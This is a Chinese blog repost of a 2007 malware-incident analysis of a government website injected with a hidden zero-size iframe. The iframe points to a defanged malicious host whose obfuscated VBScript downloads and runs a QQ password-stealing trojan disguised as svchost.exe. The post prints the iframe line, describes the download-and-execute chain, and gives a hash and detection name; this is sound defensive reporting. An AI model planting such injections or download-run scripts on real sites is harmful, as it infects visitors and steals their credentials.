某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

灰太狼 2024-02-17 13:47 120阅读 0赞

endurer 原创
2007-02-05 第1版

网站首页被加入代码：
/———
＜iframe height=0 width=0 src=”hxxp://www.g**ao**jun***888.com/4”＞＜/iframe＞
-——-/

打开网页4 中包含Javascript代码，输出一段加入多余空格、使用escape()加密的VBScript脚本程序。
该VBScript脚本程序利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件txet.exe，保存为 %temp%/svchost.exe，然后调用自定义函数yunxingexe(m5,X skj9)。
自定义函数yunxingexe()创建Shell.Application 对象XsKje，利用 XsKje 的 ShellExecute 方法来运行 %temp%/svchost.exe。

/———
文件说明符 : D:/test/txet.exe
属性 : A—-
获取文件版本信息大小失败!
创建时间 : 2007-2-1 1719
修改时间 : 2007-2-1 1725
访问时间 : 2007-2-1 1730
大小 : 62976 字节 61.512 KB
MD5 : 0d080a3e2205940a128ceb5df05db0b5
-——-/

Kapserky报为：Trojan-PSW.Win32.QQRob.iy

发表评论取消回复

表情：

评论列表（有 0 条评论，120人围观）

还没有评论，来说两句吧...

相关阅读

相关一个被挂木马的政府网站

*endurer**　原创 2006-09-21　第**1**版该网站首页被加入代码： /-------- ＜script language="JavaS...

布满荆棘的人生/ 2024年04月20日 11:18/ 0 赞/ 193 阅读

相关 3个网站被挂上的木马出自一家

*endurer**　原创 2006-09-18　第**1**版 **第1个网站** 首页被加入的的代码： /------- ＜iframe src='htx...

小咪咪/ 2024年04月20日 11:17/ 0 赞/ 167 阅读

相关又一个被挂木马的政府网站(第3版)

endurer　原创 2006-09-30　第 3版补充瑞星的反应。 2006-09-29　22:34:00 第 2版补充Kaspersky的回复。 2006

小灰灰/ 2024年03月17日 09:20/ 0 赞/ 136 阅读

相关 [10-01]某政府和某中央企业网站被挂的木马升级了(第2版)

endurer　原创 2006-10-01　第 2版补充 Kaspersky的回复。 2006-09-30　第 1版上回发现这两个网站被挂上魔兽网游盗号木马。

柔光的暖阳◎/ 2024年03月16日 19:24/ 0 赞/ 131 阅读

相关某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe

某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe endurer 原创 2007-09-06 第1版网站页面被植入代码：

青旅半醒/ 2024年02月17日 14:06/ 0 赞/ 168 阅读

相关某城市地图网站被挂上威金/Viking新变种Worm.Win32.Viking.ii

endurer 原创 2007-03-05 第1版打开该城市地图网站的网页，瑞星警告发现：Hack.Exploit.Vml.g。检查网页，发现网页所引用的 imag

你的名字/ 2024年02月17日 13:51/ 0 赞/ 121 阅读

相关某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等

endurer 原创 2007-02-28 第1版该网站的网页末被加入代码： /------ ＜iframe src=hxxp://user\\.f\\r\\e

快来打我*/ 2024年02月17日 13:51/ 0 赞/ 134 阅读

相关某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

endurer 原创 2007-02-05 第1版网站首页被加入代码： /------ ＜iframe height=0 width=0 src="hxxp:/

灰太狼/ 2024年02月17日 13:47/ 0 赞/ 121 阅读

相关一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

endurer 原创 2006-12-06 第1版该网站首页末被加入代码： /-------- ＜iframe src=hxxp://www.z\z\\\yqr

客官°小女子只卖身不卖艺/ 2024年02月17日 13:44/ 0 赞/ 132 阅读

相关某县政府网被加入下载木马Trojan-PSW.Win32.QQShou.ix的代码

endurer 原创 2006-11-14 第1版该政府网站首页末被加入代码： /-------- ＜iframe src=hxxp://www.\\\.race

刺骨的言语ヽ痛彻心扉/ 2024年02月06日 00:39/ 0 赞/ 147 阅读